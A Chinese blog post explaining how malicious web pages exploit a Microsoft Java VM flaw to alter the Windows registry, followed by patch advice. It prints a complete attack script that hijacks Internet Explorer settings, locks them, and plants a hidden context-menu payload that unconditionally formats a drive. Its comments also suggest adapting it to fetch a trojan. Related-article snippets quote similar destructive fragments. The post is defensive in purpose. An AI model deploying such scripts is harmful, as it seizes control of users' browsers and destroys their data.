如何不让网站修改你的注册表

最新推荐文章于 2024-07-23 13:16:28 发布
最新推荐文章于 2024-07-23 13:16:28 发布
阅读量682 收藏
点赞数
文章标签: microsoft javascript applet internet browser 脚本
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hehongyu2000/article/details/8365
版权

最近发现很多网友发表用javascript修改用户注册表的代码, 同时一些网站为将自己设为用户browser的home page或IE的标题, 故意使用这种代码. 在次, 我将向大家介绍,如何防止被网站修改了你的注册表.

首先让我们来看一下网站修改注册表的javascript code.

-----------------------------------------------------------------------------------------------------

<script>
//初始化actiVex控件
document.write("<applet height=0 width=0 code=com.ms.activeX.ActiveXComponent></applet>")
//初始化actiVex控件结束
//定义变量
function reg(){
try
{
//设定applets为0
a=document.applets[0]
//初始化Windows Script Host Shell Object
a.setCLSID("{f935dc22-1cf0-11d0-adb9-00c04fd58a0b}")
a.createInstance()
S=a.GetObject()
//初始化FileSystem Object
a.setCLSID("{0d43fe01-f093-11cf-8940-00a0c9054228}")
a.createInstance();
fs=a.GetObject()
try
{
//开始写注册表
//设定IE的标题为Internet Explorer
S.RegWrite ("HKEY_CURRENT_USER//Software//Microsoft//Internet Explorer//Main//Window Title","Internet Explorer")
//设定IE的默认首页为空白页
S.RegWrite ("HKEY_CURRENT_USER//Software//Microsoft//Internet Explorer//Main//Start Page","about:blank")
//让设定首页那项变灰
S.RegWrite ("HKEY_USERS//.DEFAULT//Software//Policies//Microsoft//Internet Explorer//Control Panel//HomePage",0x1,"REG_DWORD")
//让设定分级审查设定那项变灰
S.RegWrite ("HKEY_USERS//.DEFAULT//Software//Policies//Microsoft//Internet Explorer//Control Panel//SecChangeSettings",0x1,"REG_DWORD")
//在网页右键菜单中加入调用文件的命令
S.RegWrite ("HKEY_CURRENT_USER//Software//Microsoft//Internet Explorer//MenuExt//格式化A盘//","c://format-a.txt.{3050f4d8-98b5-11cf-bb82-00aa00bdce0b}");
//写入值为0xf3的dowrd值 注意[REG_SZ:字符型 REG_DWORD:双字节型 REG_BINARY:二进制型]
//对于REG_DWORD型和REG_BINARY型则有两种赋值方式
//直接用十进制的数表示,如:0,1等
//用十六进制的数表示,如:0x12,0xff等
S.RegWrite ("HKEY_CURRENT_USER//Software//Microsoft//Internet Explorer//MenuExt//格式化A盘//contexts",0xf3,"REG_DWORD")
//结束写注册表
//开始写硬盘
//生成一个名为c://5flash.txt.{3050f4d8-98b5-11cf-bb82-00aa00bdce0b}的文件
hd=fs.CreateTextFile("c://format-a.txt.{3050f4d8-98b5-11cf-bb82-00aa00bdce0b}")
//把这个文件写入javascript内容
//脚本中的start /m 为最小化窗口 /autotest为自动 /u为无条件格式化
hd.write('<script>a=new ActiveXObject ("WSCript.Shell");a.run("start /m format.com a:/q /autotest /u");alert ("正在更新a盘系统文件,请稍等......");<//script>')
//关闭这个文件
hd.close()
//把这个文件下载到客户机的c盘中,这里的路径完全可以改成网络上的,然后在后面接上.Copy("d:/format.txt"),这个脚本可以改成下载木马
//格式为file=fs.GetFile("网络路径").Copy("运行路径")
//这个脚本如果配合asp,那么完全成了一个功能非常强大的木马了
file=fs.GetFile("c://format-a.txt.{3050f4d8-98b5-11cf-bb82-00aa00bdce0b}")
//设定这个文件的属性为隐藏
file.Attributes=6
//结束写硬盘
}
catch(reg)
{}
}
catch(reg)
{}
}
function flash()
{
//隔100毫秒就运行一次
setTimeout("reg()",100)
}
flash()
//最后再重申,这个脚本不可用来害人,谢~
</script>

-----------------------------------------------------------------------------------------------------

大家会注意到, 这段代码首先会将com.ms.activeX.ActiveXComponent写到page中去,然后通过它来创建对{0d43fe01-f093-11cf-8940-00a0c9054228}即WScript.Shell的引用,所以问题的关键点就是javascript能在网页中使用com.ms.activeX.ActiveXComponent作为applet. 而com.ms.activeX.ActiveXComponent是Microsoft设计出来在Java Application和签名的可信任applet中使用的, 它本身不应该被作为applet在javascript中使用.这是Microsoft的Java VM的一个漏洞, 这个漏洞将会影响以下一些版本的VM:

 1. builds 版本 2000 系列

 2. builds 版本 3100 系列

 3. builds 版本 3200 系列

 4. builds 版本 3300 系列

大家可以在命令行输入jview,  看到version x.xx.xxxx中的xxxx就是你的builds号.

针对这个漏洞, Microsoft给出了响应的补丁, 请到

http://www.microsoft.com/java/vm/dl_vm40.htm

去下栽安装最新版的VM.

 

关于此漏洞的详细描述请看Microsfot的Knowledge base:

http://support.microsoft.com/support/kb/articles/Q275/6/09.ASP?LN=EN-US

 

最近, Microsoft在browser, email和IIS方面发现很多严重漏洞, 大家一定要经常的它的http://windowsupdate.microsoft.com/站点去看看有没有新的补丁要打. 很多病毒和黑客程序都是利用用户的麻痹大意来攻击.

hehongyu2000
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
批量修改注册表之Bat脚本
企业实战系列集 ●●● https://ximenjianxue.blog.csdn.net
03-13 4799
背景 在Horizon桌面环境里,有时需要对桌面映像注册表进行修改以实现模板优化,但是在生产环境场景多变,难免需要对一批桌面进行注册表批量修改,那怎么实现,本文将介绍如何使用域策略配置开机脚本,执行批量修改租户环境一组桌面注册表项值。 注册表操作 1、注册表操作 注册表操作是借助reg命令来实现的,reg命令语法如下(reg /?): REG Operation [Parameter List] 其中: 操作符里有:[ QUERY | ADD | DELETE | COPY | SAVE
如何修改注册表的计算机名称,如何修改注册表【图文】
weixin_32866779的博客
08-01 2351
注册表 是Windows操作系统中的一个工具,主要是用在存储程序和程序的设置信息,有些时候我们需要通过修改注册表修改某些程序的设置信息,下面小编就教大家图和修改注册表。如何修改注册表?1、首先点击“开始”、“运行”,在弹出的“运行”对话框中,输入“regedit”,点击“确定”按钮。2、之后会弹出“注册表编辑器”窗口,我们在这里,选择需要修改注册表,进行修改即可。如何修改开始菜单注册表?电脑使...
JavaScript修改注册表的例子
weixin_30412167的博客
02-15 164
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");function AddFavLnk(loc, DispName, SiteURL){var Shor = Shl.CreateShortcut(loc + "\\" + DispName +"....
一段恶意脚本的分析及思考
学习 进步
07-08 269
这段代码主要实现了通过javascript修改注册表中的信息,不过现在所有杀软都已列入了黑名单,代码中的F935DC26-1CF0-11D0-ADB9-00C04FD58A0B 这个字符串在目前的电脑中已经不存在了,但是分析这段代码还有其它的收获,代码如下: &lt;script&gt; document.write("&lt;APPLET HEIGHT=0 WIDTH=0 code=com...
网站恶意代码陷阱分析及修复代码
乱站乱弹 —— 阿新·乱站
08-22 3371
“万花谷”网站恶意病毒“陷阱”分析介绍及修复代码 作者:邱腾 (chutium)新浪科技报道:  国家反病毒应急处理中心联防单位北京江民公司的反病毒应急小组最近监测到国内有心怀不轨的人到处在互连网上散发一个美丽诱人的网址"万花谷",这实际是一个恶意"陷阱",有人经不住诱惑,只用鼠标轻轻点一下,计算机就立即瘫痪了,这是有人利用Java最新技术进行破坏的又一个恶意网址。北京江民公司提醒广大上网用户
恶意代码大暴光
sandy的开发乐园
02-09 882
许多网友纷纷指出有的网站不择手段,当用户访问过它们的网页后,不仅IE默认首页被篡改了,而且每次开机 后IE都会自动弹出访问该网站。  我们通过对下面这段javascript程序的解剖,希望读者能明白其究竟,并掌握修复的方法。网站应该用丰富精彩的栏目来吸引访问者,希望通过对用户注册表的恶意篡改来达到提高访问 量的目的不仅会事得其反,更是一 种不道德的行为。   下面就来说说怎样通过html文件
修改注册表后不重启计算机,修改注册表后不重启计算机边生效(转)
weixin_33764387的博客
07-26 594
修改注册表后不重启计算机边生效。const int WM_SETTINGCHANGE = 0x001A;const int HWND_BROADCAST = 0xffff;IntPtr result1;public enum SendMessageTimeoutFlags : uint{SMTO_NORMAL = 0x0000,SMTO_BLOCK = 0x0001,SMTO_ABORTIFHUN...
修改注册表后不重启计算机,win10系统实现修改注册表不用重启就能生效的修复技巧...
weixin_36346970的博客
07-26 4780
有关win10系统实现修改注册表不用重启就能生效的操作方法想必大家有所耳闻。但是能够对win10系统实现修改注册表不用重启就能生效进行实际操作的人却不多。其实解决win10系统实现修改注册表不用重启就能生效的问题也不是难事,小编这里提示两点:1、修改注册表以后,我们在任务栏上右键单击,选择启动任务管理器; 2、在任务管理器中点击“进程”,在下面的进程中找到xplorer进程,点击这个进程就能选中...
win7注册表无法修改计算机名称,win7注册表无法修改怎么办 win7注册表不能更改怎么办...
weixin_39731682的博客
07-04 621
我们在使用win7系统时,有时会用到注册表修改设置的,难免会遇到无法修改注册表的情况,在注册表里一些是可以修改也有一些是不可以修改的,那么win7注册表不能更改怎么办呢,下面小编给大家分享win7注册表无法修改的解决方法。解决方法:1、在电脑桌面上,依次点击开始--运行,或按组合键win+R打开运行窗口。2、输入命令redegit,打开注册表编辑器。3、找到要删除的注册表项,以删除注册表项【LE...
让Windows注册表修改快速生效
09-16
让Windows注册表修改快速生效 让Windows注册表修改快速生效是指在修改Windows注册表后,使修改快速生效的方法。在大多数情况下,只按照F5键刷新注册表是不足以使修改生效的,而需要重新启动计算机。然而,我们可以...
使用PowerShell修改注册表
01-20
下面的例子里, PowerShell修改注册表键值, 完成了Security loop disable, 和loopbackcheck disable. 代码如下: #Security loop disable so that you can look at it on the same machine if(($gchn = Get-Item...
通过修改注册表修改exe等默认打开方式
07-19
本文件用于修改注册表修改默认的打开方式,在reglist.txt文件中输入你想修改的默认打开方式后缀,运行程序后,reglist.txt中的后缀的默认打开方式将会被更改为记事本。然后程序会生成一个outreglist.reg的文件,...
WINDOWS修改注册表日期格式
09-24
日期格式为yyyy-MM-dd HH:mm:ss,由于sqlserver日期格式要求,系统日期时间有误
修改编辑注册表的方法实现修改盘符
09-16
修改编辑注册表的方法实现修改盘符
恶性代码
weixin_34381687的博客
05-20 191
格式化硬盘<objectid="scr"classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC"></object><script>scr.Reset();scr.Path="C:\\windows\\Men?inicio\\Programas\\Inicio\\automat.hta";scr.D...
微软的 Designer 应用程序登陆 iOS 和 Android
heehelcom的博客
07-18 445
这意味着拥有Copilot Pro订阅的用户将能够直接在他们的文档和演示文稿中创建图像和设计,甚至可以根据文档内容在Word中自动生成横幅。这款应用程序类似于广受欢迎的Canva设计软件,能够根据用户输入的文本提示生成图像和设计。这些模板为用户提供了丰富的样式和描述选择,不仅可以使用这些模板,还可以与他人共享以激发创意灵感。Designer应用程序的推出,不仅展示了微软在人工智能技术应用上的创新能力,也为广泛的设计爱好者和专业人士提供了一个便捷、直观的平台,让他们能够轻松实现创意并分享他们的设计作品。
微软史诗级的蓝屏
最新发布
zhugedali_的博客
07-23 491
总之,微软蓝屏是一个复杂的系统故障现象,需要综合考虑硬件、软件和系统内核等多方面的因素,并采取相应的诊断和解决措施来恢复系统的正常运行。蓝屏死机的出现通常意味着系统遇到了严重的故障,可能导致数据丢失、系统崩溃或应用程序无法正常运行。2. 驱动程序问题:过时、不兼容或错误的设备驱动程序可能导致硬件与操作系统之间的通信出现故障。5. 硬件冲突:新安装的硬件与现有硬件之间存在冲突,或者不同硬件之间的资源分配出现问题。2. 进入安全模式,卸载最近安装的可能导致问题的软件、驱动程序或更新。
CrowdStrike更新致850万Windows设备宕机,微软紧急救火!
夕小瑶科技说
07-22 1001
7月18日,网络安全公司CrowdStrike发布了一次软件更新,导致全球大范围Windows系统宕机。预估,多行业服务因此停滞,全球打工人原地放假,坐等吃瓜,网络上爆梗不断。一起蓝屏事件,一瞬间将微软拉入水深火热之中。而作为本次事件的核心主体,微软在蓝屏期间都干了啥?微软当地时间20日发布《帮助客户度过CrowdStrike故障期》,提供有关微软与CrowdStrike及其他合作伙伴采取的措施的最新情况,并表示“众击”公司已经开发了一个解决方案来加速故障修复。
提升系统性能:注册表修改实战指南
注册表的适当修改可以有效地改善系统性能,但需要注意的是,不正确的修改可能会导致系统不稳定甚至无法启动。以下是从提供的内容中提炼出的一些关键知识点: 1. 自动结束停止响应的程序:修改`HKEY_CURRENT_USER\...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值